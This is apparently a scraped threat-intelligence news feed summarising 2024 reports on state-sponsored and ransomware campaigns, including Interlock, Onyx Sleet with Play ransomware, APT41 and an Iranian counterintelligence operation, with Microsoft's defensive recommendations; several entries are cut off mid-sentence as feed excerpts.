- Read our [ransomware threat overview](https://security.microsoft.com/threatanalytics3/05658b6c-dc62-496d-ad3c-c6a795a33c27/analystreport) for advice on developing a holistic security posture to prevent ransomware, including credential hygiene and hardening Microsoft Defender customers can turn on [attack surface reduction rules](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction?ocid=magicti_ta_learndoc) to help prevent common attack techniques used by Onyx Sleet: - [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](https://learn.microsoft.co Ransomware Malware Tool Threat APT 45 ★★
BlackBerry.webp 2024-11-12 09:01:00 LightSpy: APT41 Deploys Advanced DeepData Framework In Targeted Southern Asia Espionage Campaign (direct link) The threat actor behind LightSpy has expanded their toolset with the introduction of DeepData, a modular Windows-based surveillance framework that significantly broadens their espionage capabilities.
Threat APT 41 ★★★
RiskIQ.webp 2024-11-11 18:57:29 Unwrapping the Interlock ransomware attack (direct link)
## Snapshot
Cisco Talos Incident Response has observed the Interlock ransomware group engaging in big-game hunting and double extortion attacks, targeting sectors such as healthcare, technology, and government in the United States, and manufacturing in Europe, since its emergence in September 2024.
## Description
The group employs a multi-component delivery chain, launching its attack via a compromised legitimate website that lures victims into downloading a fake browser update. This executable is a remote access tool (RAT) that establishes persistence, collects system information, and communicates with a command-and-control (C2) server. The attackers also use a credential stealer, a keylogger, and tools such as AnyDesk, PuTTY, and Azure Storage Explorer for lateral movement and data exfiltration. The Interlock ransomware, which has both Windows and Linux variants, encrypts files and appends the ".Interlock" extension, while avoiding encryption of certain system folders and file extensions. The Windows variant uses Cipher Block Chaining (CBC) encryption and the Linux variant uses CBC or RSA encryption. The ransomware establishes persistence by creating a daily scheduled task and can delete itself after encryption. A ransom note is configured to be displayed during interactive logon using Group Policy Objects, demanding a response within 96 hours to avoid data leaks and media notification.
Talos IR notes that Interlock ransomware may have connections with the operators or developers of Rhysida ransomware, suggested by similarities in tactics, techniques, and procedures (TTPs), as well as in the behavior of the ransomware encryptor binaries. Both groups use AzCopy for data exfiltration and deliver ransom notes that offer help rather than threats, indicating a trend of diversification and collaboration among ransomware groups.
## Recommendations
Microsoft recommends the following mitigations to defend against this threat:
- Keep software up to date. Apply new security patches as soon as possible.
- Turn on [cloud-delivered protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?ocid=magicti_ta_learndoc) in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.
- Enable [network protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/enable-network-protection?view=o365-worldwide?ocid=magicti_ta_learndoc).
- Run endpoint detection and response [(EDR) in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?ocid=magicti_ta_learndoc) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
- Configure [investigation and remediation](https://learn.microsoff on alerts to resolve breaches, significantly reducing alert volume.
- Read our [ransomware threat overview](https://security.microsoft.com/threatanalytics3/05658b6c-dc62-496d-ad3c-c6a795a33c27/analystreport) for advice on developing a holistic security posture to prevent ransomware, including hygiene of
Ransomware Malware Tool Threat Prediction Medical Cloud APT 45 ★★★
Weekly OSINT Highlights, 4 November 2024
(direct link)
## Snapshot
Last week's OSINT reporting highlighted state-sponsored and cybercriminal threat activity, with diverse attack vectors and targets across sectors. APT actors in North Korea, China, and Russia carried out targeted phishing, network, and malware campaigns. North Korean and Russian groups favored credential theft and ransomware tactics targeting sectors from government to military, while Chinese actors exploited firewall vulnerabilities to gain long-term access in high-stakes sectors. Meanwhile, cybercriminals leveraged social engineering, vishing, and IoT and plugin vulnerabilities to infiltrate cloud environments, IoT devices, and Android systems. The emphasis on exploiting vulnerabilities in popular software and web platforms underscores the adaptability of these threat actors as they expand their attack reach, particularly in the use of cloud, virtualization, and cryptomining strategies across a range of industries.
## Description
1. [Jumpy Pisces Ransomware Collaboration](https://sip.security.microsoft.com/intel-explorer/articles/393b61a9): Unit 42 reported on North Korea's Jumpy Pisces (Onyx Sleet) partnering with Play ransomware in a financially motivated attack targeting unspecified organizations. The threat actor used tools like Sliver, DTrack, and PsExec to gain persistence and escalate privileges, culminating in the deployment of Play ransomware.
2. [Chinese Threats Targeting Firewalls](https://sip.security.microsoft.com/intel-explorer/articles/798C0FDB): Sophos X-Ops identified China-based groups such as Volt Typhoon, APT31, and APT41 exploiting firewalls to gain access in the Pacific region. These groups use sophisticated techniques such as living-off-the-land and cross-platform rootkits.
3. [Phishing Campaign on the Naver Platform](https://sip.security.microsoft.com/intel-explorer/articles/dfee0ab5): North Korea-linked actors launched a phishing campaign targeting South Korea's Naver, attempting to steal login credentials via several phishing domains. The infrastructure, with SSL certificate changes and tracking capabilities, aligns with Kimsuky (Emerald Sleet), known for its credential theft tactics.
4. [FakeCall Vishing Malware on Android](https://sip.security.microsoft.com/intel-explorer/articles/d94c18b0): Zimperium researchers identified new FakeCall malware vishing techniques used to defraud Android users. The malware intercepts calls and mimics Android's dialer, allowing attackers to trick users into disclosing sensitive information.
5. [Facebook Business Phishing Campaign](https://sip.security.microsoft.com/intel-explorer/articles/82b49ffd): Cisco Talos detected a phishing attack targeting Facebook business accounts in Taiwan, using legal notices as a lure. LummaC2 and Rhadamanthys information-stealing malware were embedded in RAR files, collecting system credentials and evading detection through obfuscation and process injection.
6. [LiteSpeed Cache Vulnerability](https://sip.security.microsoft.com/intel-explorer/articles/a85b69db): a flaw in the LiteSpeed Cache plugin (CVE-2024-50550) could allow privilege escalation on more than six million sites. The exploited vulnerabilities allowed attackers to upload ma
Ransomware Malware Tool Vulnerability Threat Mobile Prediction Medical Cloud Technical APT 41 APT 28 APT 31 Guam ★★★
Pacific Rim timeline: Information for defenders from a braid of interlocking attack campaigns
(direct link)
## Snapshot
For more than five years, Sophos has tracked multiple China-based groups targeting its firewalls through sophisticated botnets, unique exploits, and custom malware.
## Description
Collaboration with various cybersecurity vendors, government agencies, and law enforcement has allowed Sophos to attribute specific activity to groups such as [Volt Typhoon](https://security.microsoft.com/intel-profiles/8fe93ebfb3a03fb94a92ac80847790f1d6cfa08f57b2bcebfad328a5c3e762cb), APT31 (tracked by Microsoft as Violet Typhoon), and APT41 (tracked by Microsoft as [Brass Typhoon](https://security.microsoft.com/intel-profiles/f0aaa62bfbaf3739bb92106688e6a00fc05afc0d4158b0e389b4078112d37c6)). Recent investigations by Sophos X-Ops revealed with high confidence that exploit development was taking place in Sichuan, where these exploits are believed to be shared among state-sponsored groups with varying objectives and capabilities. The analysis also highlights the exploitation of specific vulnerabilities, notably [CVE-2020-12271](https://security.microsoft.com/intel-explorer/cves/cve-2020-12271/), [CVE-2020-15069](https://security.microsoft.com/intel-explorer/cves/cve-2020-15069/), [CVE-2020-29574](https://security.microsoft.com/intel-explorer/cves/cve-2020-29574/), CVE-2022-1040, and CVE-2022-3236.
Sophos noted a significant shift in attacker behavior, moving from broad, noisy attacks aimed at establishing operational relay boxes (ORBs) to more targeted and stealthy operations against high-value infrastructure, particularly in the Indo-Pacific region. Victims include organizations in the nuclear, military, telecom, and government sectors. The tactics employed by these adversaries reflect improved stealth and persistence, including the use of living-off-the-land techniques, backdoored Java classes, memory-only Trojans, and a complex rootkit named Cloud Snooper, which is notable for its cross-platform capabilities.
## Recommendations
Microsoft recommends the following mitigations to reduce the impact of this threat.
- Turn on [cloud-delivered protection](https://learn.microsoft.com/en-us/defender-endpoint/linux-preferences) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block the majority of new and unknown threats.
- Run [EDR in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide?ocid=magicti_ta_learnDoc) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
- Configure [investigation and remediation](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide?ocid=Magicti_TA_LearnDoc) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
- [Enable](https://learn.microsoft.com/en-us/defender-endpoint/enable-controlled-folders) controlled folder access.
- Ensure that [tamper protection](https://learn.microsoft.com/en-us/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection#how-do-i-configure-O
Malware Tool Vulnerability Threat Legislation Cloud APT 41 APT 31 ★★★
Jumpy Pisces Engages in Play Ransomware
(direct link)
## Snapshot
Unit 42 has identified the North Korean state-sponsored threat group Jumpy Pisces, also known as Andariel and Onyx Sleet, engaging in a recent ransomware incident through a potential collaboration with the Play ransomware group.
## Description
Historically known for cyberespionage, financial crime, and ransomware attacks, Jumpy Pisces (which Microsoft tracks as [Onyx Sleet](https://security.microsoft.com/intel-profiles/03ced82eecb35bdb459c47b7821b9b055d1dfa00b56dc1b06f59583bad8833c0)) gained initial access to a victim's network in early September 2024 through a compromised user account. They maintained persistence and moved laterally using the open-source tool Sliver, their custom malware DTrack, and other tools such as a customized version of Mimikatz for credential dumping, a tool for creating privileged user accounts with RDP enabled, and a trojanized binary for stealing browser data. These tools communicated with a command-and-control server until the deployment of [Play Ransomware](https://security.microsoft.com/intel-profiles/5052c3d91b03a0996238bf01061afdd101c04f1afb7aeda1fc385a19b4f1b68e). During the period from May to September 2024, the attackers executed various activities, including credential harvesting and privilege escalation, and notably uninstalled endpoint detection and response (EDR) sensors before deploying the ransomware. The use of additional tools like TokenPlayer for Windows access token abuse and PsExec was also observed. The nature of Jumpy Pisces ([Onyx Sleet](https://security.microsoft.com/intel-profiles/03ced82eecb35bdb459c47b7821b9b055d1dfa00b56dc1b06f59583bad8833c0))'s involvement with [Play Ransomware](https://security.microsoft.com/intel-profiles/5052c3d91b03a0996238bf01061afdd101c04f1afb7aeda1fc385a19b4f1b68e) is not definitively clear, as they could be acting as an affiliate or as an Initial Access Broker (IAB) by selling network access to Play ransomware actors.
This incident marks a significant development in cyber threats, indicating a convergence of state-sponsored and underground ransomware operations and potentially signaling a trend where North Korean threat groups increasingly participate in global ransomware campaigns.
## Microsoft Analysis and Additional OSINT Context
The threat actor that Microsoft tracks as Onyx Sleet is a North Korea-affiliated activity group. First observed by Microsoft in 2014, Onyx Sleet has conducted cyber espionage through numerous campaigns aimed at global targets with the goal of intelligence gathering. More recently, it has expanded its goals to include financial gain. This threat actor operates with an extensive set of custom tools and malware, and regularly evolves its toolset to add new functionality and to evade detection, while keeping a fairly uniform attack pattern. Onyx Sleet's ability to develop a spectrum of tools to launch its tried-and-true attack chain makes it a persistent threat, particularly to targets of interest to North Korean intelligence, like organizations in the defense, engineering, and energy sectors. On July 25, 2024, the United States Department of Justice (DOJ) indicted an individual linked to the North Korean threat actor that Microsoft tracks as Onyx Sleet. Microsoft Threat Intelligence collaborated with the Federal Bureau of Investigation (FBI) in tracking activity associated with Onyx Sleet. Onyx Sleet is tracked by other security companies as SILENT CHOLLIMA, Andariel, DarkSeoul, Stonefly, TDrop2, Jumpy Pisces, and APT45. Microsoft tracks campaigns related to Onyx Sleet and directly notifies customers who have been targeted or compromised, providing them with the necessary information to help secure their environments. Microsoft Defender for Endpoint detects this activity as Onyx Sleet activity group.
Microsoft Defender customers can turn on attack surface reduction rules to prevent common attack techniques such as blocking executable files from running unless they meet a prevalence, age, or trusted list criterion, blocking the launch of potentially obfuscated
Ransomware Malware Tool Threat Prediction APT 45 ★★
North Korea's Andariel Pivots to 'Play' Ransomware Games
(direct link)
The prominent state-sponsored advanced persistent threat (APT), aka Jumpy Pisces, appears to be moving away from its primary cyber-espionage motives and toward wreaking widespread disruption and damage.
Ransomware Threat APT 45 ★★
North Korean Group Collaborates with Play Ransomware in Significant Cyber Attack
(direct link)
Threat actors in North Korea have been implicated in a recent incident that deployed a known ransomware family called Play, underscoring their financial motivations. The activity, observed between May and September 2024, has been attributed to a threat actor tracked as Jumpy Pisces, which is also known as Andariel, APT45, DarkSeoul, Nickel Hyatt, Onyx Sleet (formerly Plutonium), Operation Troy,
Ransomware Threat APT 15 APT 45 ★★★
Chinese Nation-State Hackers APT41 Hit Gambling Sector for Financial Gain
(direct link)
The prolific Chinese nation-state actor known as APT41 (aka Brass Typhoon, Earth Baku, Wicked Panda, or Winnti) has been attributed to a sophisticated cyber attack targeting the gambling and gaming industry. "Over a period of at least six months, the attackers stealthily gathered valuable information from the targeted company including, but not limited to, network configurations, user passwords,
APT 41 ★★★
Technical Analysis of a Novel IMEEX Framework
(direct link)
#### Targeted geolocations
- Afghanistan
- Djibouti
## Snapshot
Researchers at Intezer have published a report detailing the IMEEX framework, a sophisticated custom malware designed to target Windows systems.
## Description
The IMEEX framework offers a range of features, such as remote command execution, file manipulation, process control, and registry modification. Delivered as a 64-bit DLL, it allows attackers to take full control of compromised machines, while its reconnaissance capabilities collect critical system information, which is sent to a command-and-control (C2) server. IMEEX's capabilities make it a powerful tool for remote system control, using a modular approach that lets it load and execute components on demand, enhancing its flexibility. IMEEX was identified primarily in Djibouti, with a less capable variant seen in Afghanistan. However, Intezer assesses that the campaign is likely not limited to these countries alone. The malware is designed for stealth, blending in with legitimate system processes such as svchost.exe and using encrypted communication to avoid detection. It uses various persistence techniques, such as modifying registry keys and using mutexes to prevent multiple instances. Notably, the observed IMEEX campaign reuses infrastructure previously seen distributing [ShadowPad](https://security.microsoft.com/intel-profiles/shadowpad), a modular malware platform used by Chinese threat actors, suggesting possible links between these campaigns. However, Intezer is not able to confidently attribute the activity at this time.
Intezer notes that IMEEX has been deployed primarily in regions of geopolitical significance, with Djibouti and Afghanistan being key areas due to their strategic importance for global trade and security. The company assesses that China's interests in both countries suggest that malware like IMEEX is being used as a tool for espionage and for maintaining influence without direct conflict.
## Microsoft Analysis
ShadowPad is a modular backdoor identified by Kaspersky in 2017, although researchers have pointed out samples dating back to 2015. Evidence of ShadowPad in your network should prompt an elevated response due to its historical use in government-backed supply chain attacks. Chief among these are the [2017 NetSarang server management software compromise](https://www.csoonline.com/article/562645/kaspersky-discovers-supply-chain-attack-at-netsarang.html) and the [2017-2018 compromise of Avast's popular CCleaner](https://www.wired.com/story/inside-the-unnerving-supply-chain-attack-that-corrupted-ccleaner/), both the work of Chinese advanced persistent threat (APT) groups.
Microsoft Threat Intelligence has observed Chinese threat actors leveraging ShadowPad to maintain persistent access and exfiltrate data from victim environments. For example, the threat actor Microsoft tracks as [Storm-0147](https://security.microsoft.com/intel-profiles/de13fce840ca95805ab1e06edb35a9b2a87faf1226230cbd36c3231727087d64), a China-based cyber espionage group, has been observed leveraging ShadowPad in a number of its attacks. The group is known for primarily targeting government agencies, think tanks, agricultural entities, and mining entities in Central and Southeast Asia, the Pacific region, and South America. Some of the group's activity overlaps with at least two other activity groups based on
Ransomware Malware Tool Threat Technical APT 41 ★★
RiskIQ.webp 2024-10-08 05:14:51 Awaken Likho is awake: new techniques of an APT group (direct link)
#### Targeted geolocations
- Russia
## Snapshot
Researchers at Kaspersky have identified a campaign by the APT group Awaken Likho, also known as Core Werewolf, targeting Russian government agencies and industrial enterprises.
## Description
The campaign, active from June through at least August 2024, marked a shift in tactics, with the group now using MeshAgent, an agent for the legitimate MeshCentral platform, instead of the UltraVNC module it previously used for remote system access. The implant was delivered via a malicious URL, likely through phishing emails, and was packed in a self-extracting archive using UPX. The attack chain included an AutoIt script executing two files, NetworkDrivers[.]exe and NKKA9A82KJN8KJHA9[.]cmd, to ensure persistence. NetworkDrivers[.]exe is a MeshAgent that interacts with the C2 server, while the heavily obfuscated NKKA9A82KJN8KJHA9[.]cmd script creates a scheduled task named MicrosoftepDatDateTaskMachinems, which runs EdgeBrowser.cmd and deletes traces of the attack. The attackers also used a configuration file, NetworkDrivers[.]msh, for MeshAgent to establish a connection with the MeshCentral server. Based on the tactics, techniques, and procedures (TTPs) used, the victimology, and the evolution of their methods, Kaspersky attributes these attacks to Awaken Likho. The group has been active since the start of the Russia-Ukraine conflict and continues to evolve its methods, indicating that its malware is still under development and that further attacks are likely.
## Microsoft Analysis
MeshAgent is an open-source [remote management tool](https://security.microsoft.com/intel-explorer/articles/9782a9ef) that has been exploited by various threat actors to gain unauthorized access to victims. It can collect system information essential for remote management and offers features such as power and account management, chat or message pop-ups, file transfer, and command execution. In addition, it supports web-based remote desktop capabilities such as RDP and VNC. Although users may rely on this legitimate remote system management tool, these features are also very attractive to malicious actors. For example, in May, [Cisco Talos reported](https://security.microsoft.com/intel-explorer/articles/39e87f2a) on a data theft campaign using MeshAgent with Quasar RAT to compromise vulnerable internet-exposed application servers. And in March, [AhnLab Security Intelligence Center (ASEC) reported](https://asec.ahnlab.com/en/63192/) on the state-sponsored Andariel group exploiting MeshAgent to target Korean asset management solutions.
## Recommendations
Microsoft recommends the following mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations.
- Review our technical profile on [abuse of remote monitoring and management tools](https://security.microsoft.com/intel-explorer/articles/9782a9ef) to block and hunt for tools like MeshAgent.
- Pilot and deploy [phishing-resistant authentication methods for users](https://learn.microsoft.com/en-us/entra/identity/authentication/concept-authentication-methods?ocid=Magicti_ta_learndoc).
- Configure Microsoft Defender for Office 365 to [recheck links on click](https://learn.microsoft.com/en-us/defender-office-365/safe-links-about?ocid=Magicti_TA_LearnDoc). Safe Links provides URL scanning and rewriting of inbound email messages in mail flow, and time-of-click verification of URLs and
Malware Tool Threat Industrial APT 45 ★★★
Weekly OSINT Highlights, 7 October 2024
(direct link)
## Snapshot
Last week's OSINT reporting highlights diverse and sophisticated attack tactics, primarily focusing on nation-state actors, cybercriminal groups, and advanced malware campaigns. Common attack vectors include spear-phishing, exploiting vulnerabilities (such as CVEs in Linux servers and AI infrastructure), and malware delivered through fileless methods. The malware ranges from Joker's subscription fraud (targeting mobile devices) to more complex backdoors like WarmCookie, which allows system profiling and further malware deployment. North Korean APT groups (APT37 and Stonefly) remain active, targeting Southeast Asia and United States companies, while Iranian actors focus on political campaigns. Financially motivated attacks are also prominent, with ransomware groups like Meow and attackers using MedusaLocker deploying advanced techniques for exfiltration and encryption. Cloud environments and AI infrastructure, including generative models like AWS Bedrock, have emerged as critical targets, exposing new vulnerabilities for resource hijacking and illicit services.
## Description
1. [Golden Chickens' More_Eggs](https://sip.security.microsoft.com/intel-explorer/articles/4cb94d70): Trend Micro discovered the use of the more_eggs backdoor in spear-phishing attacks, targeting various industries. Recent campaigns involved advanced social engineering, and while attribution remains unclear, there are possible ties to FIN6 (Storm-0538).
2. [Linux Malware Campaign](https://sip.security.microsoft.com/intel-explorer/articles/68e49ad7): Elastic Security Labs uncovered a Linux malware campaign using KAIJI for DDoS attacks and RUDEDEVIL for cryptocurrency mining. The attackers exploited Apache2 vulnerabilities and used Telegram bots for communication and persistence.
3. [Rhadamanthys Malware Updates](https://sip.security.microsoft.com/intel-explorer/articles/c9ea8588): Recorded Future reported on the evolving Rhadamanthys information-stealing malware, now incorporating AI-driven OCR for cryptocurrency theft. It targets systems in North and South America, leveraging encryption and advanced defense evasion techniques.
4. [NVIDIA Container Toolkit Vulnerability](https://sip.security.microsoft.com/intel-explorer/articles/a35e980e): Wiz Research discovered a critical vulnerability (CVE-2024-0132) in the NVIDIA Container Toolkit, exposing cloud and AI environments to container escape attacks. This flaw could lead to unauthorized control over host systems and data exfiltration.
5. [K4Spreader and PwnRig Campaign](https://sip.security.microsoft.com/intel-explorer/articles/416b07c0): Sekoia TDR linked a campaign exploiting WebLogic vulnerabilities to the 8220 Gang, deploying the K4Spreader malware and PwnRig cryptominer. The attackers primarily target cloud environments for Monero mining, exploiting both Linux and Windows systems.
6. [Nitrogen Malware Incident](https://sip.security.microsoft.com/intel-explorer/articles/d0473059): The DFIR Report analyzed an attack using Nitrogen malware delivered through a malicious Advanced IP Scanner installer. The threat actor used Sliver and Cobalt Strike beacons, eventually deploying BlackCat ransomware across the victim's network.
7. [Gorilla Botnet's DDoS Attacks](https://sip.security.microsoft.com/intel-explorer/articles/0bcef023): NSFOCUS identified the Gorilla Botnet, a Mirai variant, launching over 300,000 DDoS attacks. Its primary targets were U.S., Chinese, and global sectors, including government and telecom, using advanced encryption techniques for stealth.
8. [Iranian IRGC Cyber Activity](https://sip.security.microsoft.com/intel-explorer/articles/42850d7b): The FBI and UK's NCSC warned about Iranian IRGC-affiliated actors targeting individuals related to Middle Eastern affairs. Using social engineering, they focused on stealing credentials and influencing U.S. political campaigns.
9. [Critical Infrastructure Reconnaissance](https://sip.security.microsoft.com/intel-explorer/articles/d491ff08): Dragos detected a campaign targeting North Ame
Ransomware Malware Tool Vulnerability Threat Mobile Prediction Cloud APT 37 APT 45 ★★
The_Hackers_News.webp 2024-09-26 17:58:00
N. Korean Hackers Deploy New KLogEXE and FPSpy Malware in Targeted Attacks
Threat actors with ties to North Korea have been observed leveraging two new malware strains dubbed KLogEXE and FPSpy. The activity has been attributed to an adversary tracked as Kimsuky, which is also known as APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (formerly Thallium), Sparkling Pisces, Springtail, and Velvet Chollima. "These samples enhance Sparkling Pisces' already extensive arsenal
Malware Threat APT 43 ★★
DarkReading.webp 2024-09-20 01:00:00
North Korean APT Bypasses DMARC Email Policies in Cyber-Espionage Attacks
How the Kimsuky nation-state group and other threat actors are exploiting poor email security - and what organizations can do to defend themselves.
Threat APT 43 ★★★★
RiskIQ.webp 2024-09-02 19:54:58
Weekly OSINT Highlights, 2 September 2024
## Snapshot
Last week's OSINT reporting highlighted a diverse set of cyber threats and attack methodologies across multiple sectors and geographies. Key trends included the growing sophistication of phishing campaigns, such as those leveraging cross-platform malware like Cheana Stealer and novel tactics like quishing via QR codes. The deployment of CobaltStrike beacons, AppDomainManager injection techniques, and the abuse of legitimate services such as Microsoft Sway, Cloudflare tunnels, and remote management tools also featured prominently, underscoring the evolving toolkit of cybercriminals and state-sponsored actors. Targeted entities spanned industries including finance, government, healthcare, and critical infrastructure, with attackers frequently using advanced persistence mechanisms, exploiting zero-day vulnerabilities, and deploying ransomware in double-extortion schemes.
## Description
1. [Korean Users Targeted with Remote Access Malware](https://sip.security.microsoft.com/intel-explorer/articles/b920e285): AhnLab Security Intelligence Center (ASEC) discovered a cyberattack targeting Korean users in which an unknown attacker deployed remote access malware, including AsyncRAT, and custom backdoors such as FXFDOOR and NOMU. The attack, potentially linked to the North Korean group Kimsuky, focused on information theft, with spearphishing and vulnerabilities in IIS and MS Exchange as possible entry points.
2. [Phishing Campaign Disguised as HR Survey Targets Office 365 Credentials](https://sip.security.microsoft.com/intel-explorer/articles/9431aa5a): Cofense researchers identified a phishing attack posing as a mid-year engagement survey to steal Microsoft Office 365 credentials. The attack used a fake HR email directing recipients to a Wufoo-hosted page, ultimately leading to a fraudulent Microsoft login page designed to harvest credentials.
3. [Cross-Platform Phishing Campaign with Cheana Stealer](https://sip.security.microsoft.com/intel-explorer/articles/69d7b49e): Cyble Research and Intelligence Lab (CRIL) uncovered a phishing campaign targeting Windows, Linux, and macOS users with Cheana Stealer malware, distributed via a site impersonating a VPN provider. The malware aimed to steal cryptocurrency wallets, browser passwords, and SSH keys, leveraging a Telegram channel for widespread distribution, highlighting the attackers' focus on compromising diverse systems.
4. [Zero-Day Vulnerability in Versa Director Exploited by APT](https://sip.security.microsoft.com/intel-explorer/articles/1af984be): Versa Networks identified a zero-day vulnerability (CVE-2024-39717) in the Versa Director GUI, exploited by an APT actor to upload malicious files disguised as PNG images. The attack was facilitated by poor system hardening and exposed management ports, affecting customers who had failed to properly secure their environment.
5. [Mallox Ransomware Exploits Cloud Misconfiguration](https://sip.security.microsoft.com/intel-explorer/articles/d9af6464): Trustwave investigated a Mallox
Ransomware Malware Tool Vulnerability Threat Mobile Medical Cloud APT 41 APT 32 ★★
The_Hackers_News.webp 2024-08-30 16:45:00
Iranian Hackers Set Up New Network to Target U.S. Political Campaigns
Cybersecurity researchers have unearthed new network infrastructure set up by Iranian threat actors to support activities linked to the recent targeting of U.S. political campaigns. Recorded Future's Insikt Group has linked the infrastructure to a threat it tracks as GreenCharlie, an Iran-nexus cyber threat group that overlaps with APT42, Charming Kitten, Damselfly, Mint Sandstorm (formerly
Threat APT 35 APT 42 ★★★
RiskIQ.webp 2024-08-30 15:08:41 I Spy With My Little Eye: Uncovering an Iranian Counterintelligence Operation
#### Targeted Geolocations
- Israel
## Snapshot
Mandiant has disclosed details of a counterintelligence campaign suspected to be linked to Iran, targeting Iranians and perceived domestic threats who may collaborate with foreign intelligence agencies, especially those in Israel.
## Description
The operation aims to gather personal and professional data, potentially aiding Iranian intelligence in identifying collaborators with Iran's adversaries and tracking human intelligence (HUMINT) activities against Iran. The campaign likely targets Iranian dissidents, activists, and Farsi speakers both inside and outside Iran. Mandiant attributes the campaign to Iran with high confidence due to its tactics, techniques, and procedures (TTPs). Mandiant assesses there is some overlap with APT42, a known Iranian cyber-espionage group associated with the Islamic Revolutionary Guard Corps (IRGC) Intelligence Organization. The campaign disseminates over 35 fake recruitment websites via social media, posing as Israeli human resources firms to lure targets into providing sensitive information. The operation has been active since at least 2017 and has parallels with previous efforts targeting Arabic speakers linked to Syria and Hezbollah, suggesting a broader counterintelligence strategy.
## References
[I Spy With My Little Eye: Uncovering an Iranian Counterintelligence Operation](https://cloud.google.com/blog/topics/threat-intelligence/uncovering-iranian-counterintelligence-operation/). Mandiant (accessed 2024-08-29)
## Copyright
**© Microsoft 2024**. All rights reserved. Reproduction or distribution of the content of this site, or any part thereof, without written permission of Microsoft is prohibited.
Cloud APT 42 ★★★
RiskIQ.webp 2024-08-28 20:46:51
Hackers now use AppDomain Injection to drop CobaltStrike beacons
#### Targeted Geolocations
- Taiwan
- Vietnam
- Philippines
## Snapshot
NTT researchers identified a wave of attacks starting in July 2024 that exploit the AppDomainManager injection technique, which has rarely been observed in the wild. The attacks targeted government agencies in Taiwan, the military in the Philippines, and energy organizations in Vietnam.
## Description
The attacks culminate in the deployment of a [CobaltStrike](https://security.microsoft.com/intel-profiles/fd8511c1d61e93d39411acf36a31130a6795efe186497098fe0c6f2ccfb920fc) beacon, and there are indications of overlap with recent AhnLab reports, suggesting the involvement of the Chinese state-sponsored threat group APT 41, although this attribution has low confidence. The AppDomainManager injection technique abuses the .NET Framework's AppDomainManager class. The attacks observed by NTT begin with the delivery of a ZIP archive containing a malicious MSC file, which exploits a cross-site scripting (XSS) vulnerability in the Windows apds.dll library to execute arbitrary code via Microsoft Management Console (MMC) using specially crafted .msc files. These .msc files leverage the GrimResource technique, which allows scripts to run automatically when a file is opened, eliminating the need for user interaction. This ultimately leads to a CobaltStrike beacon being loaded on the machine, enabling a wide range of malicious actions. According to NTT, the combination of the AppDomainManager injection and GrimResource techniques indicates that the attackers have the technical expertise to use new and lesser-known techniques in practical cases.
## Microsoft Analysis
Management Saved Console (.msc) files are used to store configurations for Microsoft Management Console (MMC), but they can be abused by threat actors to launch malicious code. Microsoft Threat Intelligence has observed the threat actors [Emerald Sleet](https://security.microsoft.com/intel-profiles/f1e214422dcaf4fb337dc703ee4ed596d8ae16f942f442b895752ad9f41dd58e) and [Twill Typhoon](https://security.microsoft.com/intel-profiles/01aef6bb1a4cd12178aca7fceb848002164b83bf375fa33699ed4c5523b4fd3c) using this technique as an initial access vector to deploy malicious files on targeted devices. Other threat actors have deployed malware such as Cobalt Strike using a technique that researchers call GrimResource, which refers to a specially crafted .msc file that uses a cross-site scripting (XSS) flaw found in apds.dll to execute code using MMC. Microsoft Defender Antivirus detects GrimResource and malware deployed by these malicious .msc files. When opening an .msc file downloaded from the internet or attached to an email, a user must accept a security warning prompt before the .msc file is launched. Organizations can further defend against this technique by leveraging attack surface reduction rules to limit the types of executables allowed to run in their environment. Read more about how threat actors use [MMC files to deliver malware](https://security.microsoft.com/intel-explorer/articles/5b8609f0).
## Detections / Hunting Queries
### Microsoft Defender Antivirus
Microsoft Defender Antivirus detects threat components as the following malware:
- Trojan:XML/GrimResource.B
- TrojanDropper:JS/GrimResource.C
Microsoft has observed post-compromise activity with the following antivirus detections:
- [Trojan:Win64/CobaltStrike.QF](htt
Ransomware Malware Tool Vulnerability Threat Technical APT 41 ★★★
Mandiant.webp 2024-08-28 14:00:00
I Spy With My Little Eye: Uncovering an Iranian Counterintelligence Operation
Written by: Ofir Rozmann, Asli Koksal, Sarah Bock
Today Mandiant is releasing details of a suspected Iran-nexus counterintelligence operation aimed at collecting data on Iranians and domestic threats who may be collaborating with intelligence and security agencies abroad, particularly in Israel. The data collected by this campaign may support the Iranian intelligence apparatus in pinpointing individuals who are interested in collaborating with Iran's perceived adversarial countries. The collected data may be leveraged to uncover human intelligence (HUMINT) operations conducted against Iran and to persecute any Iranians suspected to be involved in these operations. These may include Iranian dissidents, activists, human rights advocates, and Farsi speakers living in and outside Iran. Mandiant assesses with high confidence this campaign was operated on behalf of Iran's regime, based on its tactics, techniques, and procedures (TTPs), themes, and targeting. In addition, we observed a weak overlap between this campaign and APT42, an Iran-nexus threat actor suspected to operate on behalf of Iran's IRGC Intelligence Organization (IRGC-IO). This campaign's activities are in line with Iran's IRGC and APT42's history of conducting surveillance operations against domestic threats and individuals of interest to the Iranian government. Despite the possible APT42 connection, Mandiant observed no relations between this activity and any U.S. elections-related targeting as previously reported by Google's Threat Analysis Group. The activity used multiple social media accounts to disseminate a network of over 35 fake recruiting websites containing extensive Farsi decoy content, including job offers and Israel-related lures, such as images of Israeli national symbols, hi-tech offices, and major city landmarks. Upon entry, the targeted users are required to enter their personal details as well as their professional and academic experience, which are 